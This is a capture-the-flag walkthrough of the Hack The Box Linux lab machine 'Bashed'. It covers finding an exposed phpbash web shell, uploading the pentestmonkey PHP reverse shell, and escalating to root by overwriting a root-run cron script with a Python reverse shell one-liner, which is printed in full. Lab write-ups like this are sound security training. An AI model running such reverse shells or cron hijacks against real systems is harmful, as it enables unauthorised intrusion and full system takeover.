BASHED -HTB Writeup

Type:Linux

IP: 10.10.10.68

Bashed is a fairly straightforward box. Let’s start the walkthrough with basic enumeration!

Nmap scan :

Let’s now head over to http://10.10.10.68 (port 80 by default).

Nothing found in this page after viewing source code & other details. Click on the arrow .

Click on https://github.com/Arrexel/phpbash — You will get all the information.

https://blog.sucuri.net/2020/09/phpbash-terminal-editor-web-shell.html — You can also visit this blog for better understanding.

Do a directory search as in sc shot the directory was not get opened as mentioned in the url https://github.com/Arrexel/phpbash.

10.10.10.68/uploads/phpbash.php — not worked.

Do a Directory search using dirbuster.

Tried 10.10.10.68/sendMail.php but not worked again

js files not much important for this time.

Looking in /dev/, we find phpbash.php and phpbash.min.php.

Info: The /dev directory contains the special device files for all the devices. The device files are created during installation, and later with the /dev/MAKEDEV script.

Click on any one of the .php files, and we get a very convenient shell as www-data.

Do a cat /etc/passwd — you can see the user & other details.

cd /home/arrexel & see there are two user: arrexel & scriptmanager

1st flag is found. Now look for next flag root flag.

Check put permission by sudo -l

As we can change into another user scriptmanager with no password.

As previously we have do upload & get a shell & listen through netcat but this time no tab or section for this but we have directory uploads & check it once .Nothing there. if we can upload any malicious file to this apache shell our half of the work can be completed as we have already access to www-data . So lets check the folder of any web server /var/www/html/uploads.Tried curl not worked then tried wget its worked.

INFO: https://www.pythonforbeginners.com/modules-in-python/how-to-use-simplehttpserver

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php — only change the ip & the port you want to listen

VICTIM SYSTEM

Check out the file & listen through netcat

As tty is not present .So try to upgrade shell

after upgrading login as scriptmanager and see there is a script folder. Try to explore.

it has two file test.py & test.txt . Interesting part is that test.txt is owned by root user.

Check the timing of test.txt ruuning on interval. Means some cron job is running .

As test.py have test.txt which means when its runs a test.txt file is created & owned by root. So some if we can run our own test.py then we can be the root as only output file is owned by root .

Info: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet — you can try any reverse shell but i will go for python:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ip”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’> — save this file & download this file. Enter the your ip & port.

victim machine

Name the file same as test.py & start netcat to listen.

& now you are the root. Ignore the nc -lnvp 4444 after root.

cat /root/root.txt — and find the flag.

Learning:

1. SimpleHttpServer in depth.
2. Dev folder .
3. More Knowledge about privilege escalation
4. Some tricky part at scripts.